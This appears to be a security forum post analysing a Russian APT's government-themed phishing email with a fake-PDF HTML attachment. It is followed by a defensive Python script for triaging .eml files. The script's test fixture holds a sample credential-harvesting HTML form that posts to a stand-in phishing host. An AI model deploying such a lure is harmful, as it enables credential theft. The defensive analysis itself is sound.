Russian APT actor phishes the Baltics and the Balkans

Khushal
Thread author
Apr 4, 2024
On December 5th, a Russian APT targeted Transnistria’s governing body with a credential phishing email attachment, spoofing the Pridnestrovian Moldavian Republic. The image below shows the email content translated.

[Image: screenshot of the email content, translated]

This is a classic example of a targeted, government‑themed credential‑phishing email with an .html attachment used as the lure.

What the email is trying to do
From the screenshot and the blog description:

  • It impersonates the Presidential Administration of the Pridnestrovian Moldavian Republic.
  • It uses an “official order” with a reference number and dates to add legitimacy.
  • It pressures the recipient with a review deadline and states the order is mandatory for all units.
  • The malicious content is in an HTML file attachment masquerading as a PDF (name like: Распоряжение № 441рп.pdf.html).
  • Opening that .html file in a browser typically leads to a fake login page or script designed to steal credentials.

Everything here matches common APT spear‑phishing TTPs: highly relevant theme, real‑looking sender, no obvious typos, and a file name crafted to look like a normal document rather than malware.

Red flags in this specific email

  • .html attachment disguised as PDF: The double extension (.pdf.html) is a strong indicator of phishing. Real internal orders are usually sent as PDF, DOCX, or via an internal document system, not HTML.
  • Urgency and obligation: “implementation is mandatory for all units” + hard deadline – a classic pressure tactic.
  • “Please see appendix / attachment” without context: No summary of the order or details in the body – the aim is to get you to click, not to inform.
  • Potential spoofing of the sender: Even if the domain looks correct, APTs often abuse look‑alike domains, compromised accounts, or weaknesses in SPF/DKIM/DMARC.

If someone receives a similar email

  • Do not open .html, .htm, or .shtml attachments claiming to be “documents” or “PDFs”.
  • Verify via an independent channel: call or message the supposed sender using known contact info (not what’s in the email).
  • If it’s work‑related, forward to your IT/security team or use the company’s “Report Phishing” function.
  • If you already opened the attachment and entered credentials:
    • Change those passwords immediately from a clean device.
    • Enable MFA/2FA if not already on.
    • Inform your security/IT team so they can check for suspicious logins and lateral movement.

Defensive measures organizations can take

  • Email security policies:
    • Block or heavily scrutinize .html attachments from external senders.
    • Use sandboxing/URL rewriting to detonate and analyze attachments/links.
  • Account hardening:
    • Enforce MFA, ideally FIDO2 security keys for high‑risk users.
    • Monitor for unusual logins, especially from unusual geographies or Tor/VPN exit nodes.
  • Awareness training:
    • Teach staff that “official orders” can be weaponized and that double extensions are suspicious.
    • Simulated phishing (done by IT/security) to train recognition of similar lures.

Summary
This email is a well‑crafted, state‑style spear‑phishing lure using an “official order” and a fake PDF/HTML attachment to harvest credentials. The main takeaways are: don’t trust HTML “documents,” verify through other channels, use MFA, and report such messages to your organization’s security team or, on MalwareTips, share samples/logs in the appropriate section for expert review.
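Added example, not code from the post above and not from the blog it references: a small Python triage script that applies the "Defensive measures" checks to a raw .eml, flagging .html attachments, document-style double extensions such as .pdf.html, attachments that claim to be PDF but start like HTML, and the absence of dmarc=pass in the Authentication-Results header. The two sample messages are constructed here (sender, recipient, subject, header values and attachment bodies are assumptions); only the attachment filename is the one quoted in the post, and the function names are mine.

```python
"""Triage an .eml for the HTML-as-PDF lure discussed in the post.

Added example, not code from the original post. The sample messages are
constructed: addresses, subject, Authentication-Results values and the
attachment bodies are assumptions; only the attachment filename
"Распоряжение № 441рп.pdf.html" is taken from the post.
"""
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "odt"}
HTML_EXTS = {"html", "htm", "shtml"}


def extension_findings(filename):
    """Flag HTML attachments and document-looking double extensions (x.pdf.html)."""
    findings = []
    parts = filename.lower().rsplit(".", 2)  # keep at most the last two extensions
    if len(parts) < 2:
        return findings
    if parts[-1] in HTML_EXTS:
        findings.append(f"html attachment: {filename}")
    if len(parts) == 3 and parts[1] in DOC_EXTS and parts[2] not in DOC_EXTS:
        findings.append(f"double extension .{parts[1]}.{parts[2]}: {filename}")
    return findings


def sniff_kind(data):
    """Classify attachment bytes by their leading content, not by the declared type."""
    if data.startswith(b"\xef\xbb\xbf"):  # strip a UTF-8 BOM
        data = data[3:]
    head = data.lstrip()[:64].lower()
    if head.startswith(b"%pdf-"):
        return "pdf"
    if head.startswith((b"<!doctype", b"<html", b"<script", b"<meta", b"<?xml")):
        return "html"
    return "unknown"


def analyze_eml(raw):
    """Parse raw .eml bytes and return {'findings': [...], 'verdict': ...}."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []
    auth = str(msg.get("Authentication-Results", "") or "")
    if "dmarc=pass" not in auth.lower():
        findings.append("no dmarc=pass in Authentication-Results (sender unverified)")
    attachment_hits = 0
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        hits = extension_findings(name)
        data = part.get_payload(decode=True) or b""
        claims_pdf = ".pdf" in name.lower() or part.get_content_type() == "application/pdf"
        if claims_pdf and sniff_kind(data) == "html":
            hits.append(f"claims PDF but content is HTML: {name}")
        attachment_hits += len(hits)
        findings.extend(hits)
    if attachment_hits:
        verdict = "block"      # attachment-level indicator: quarantine the message
    elif findings:
        verdict = "review"     # only sender authentication is missing: analyst look
    else:
        verdict = "clean"
    return {"findings": findings, "verdict": verdict}


def build_sample(filename, content_type, body, auth_results):
    """Build a constructed test message and return it as raw .eml bytes."""
    msg = EmailMessage(policy=policy.default)
    msg["From"] = "Administration <admin@example.invalid>"  # assumed address
    msg["To"] = "office@example.invalid"                     # assumed address
    msg["Subject"] = "Order No. 441rp"
    msg["Authentication-Results"] = auth_results
    msg.set_content("See the attached order. Implementation is mandatory for all units.")
    maintype, subtype = content_type.split("/", 1)
    msg.add_attachment(body, maintype=maintype, subtype=subtype, filename=filename)
    return msg.as_bytes()


# Constructed lure: an HTML credential form named like a PDF, unauthenticated sender.
LURE_EML = build_sample(
    "Распоряжение № 441рп.pdf.html",
    "text/html",
    b"<!DOCTYPE html><html><body><form action='https://phish.example.invalid/'>"
    b"<input name='user'><input name='pass' type='password'></form></body></html>",
    "mx.example.invalid; spf=fail; dkim=none; dmarc=fail (p=quarantine)",
)

# Constructed benign control: a real PDF header, plain name, authenticated sender.
BENIGN_EML = build_sample(
    "report.pdf",
    "application/pdf",
    b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n1 0 obj << /Type /Catalog >> endobj\n",
    "mx.example.invalid; spf=pass; dkim=pass; dmarc=pass",
)

if __name__ == "__main__":
    for label, raw in (("lure", LURE_EML), ("benign", BENIGN_EML)):
        result = analyze_eml(raw)
        print(label, result["verdict"])
        for finding in result["findings"]:
            print("  -", finding)
```

The content sniff matters more than the filename check: a gateway rule that only looks at the extension is defeated by a bare .html name or a content-type of application/pdf, while the leading bytes still give the file away. Feed it a real .eml with `analyze_eml(open(path, "rb").read())`; the verdict "block" means an attachment-level indicator fired, "review" means only the sender failed authentication.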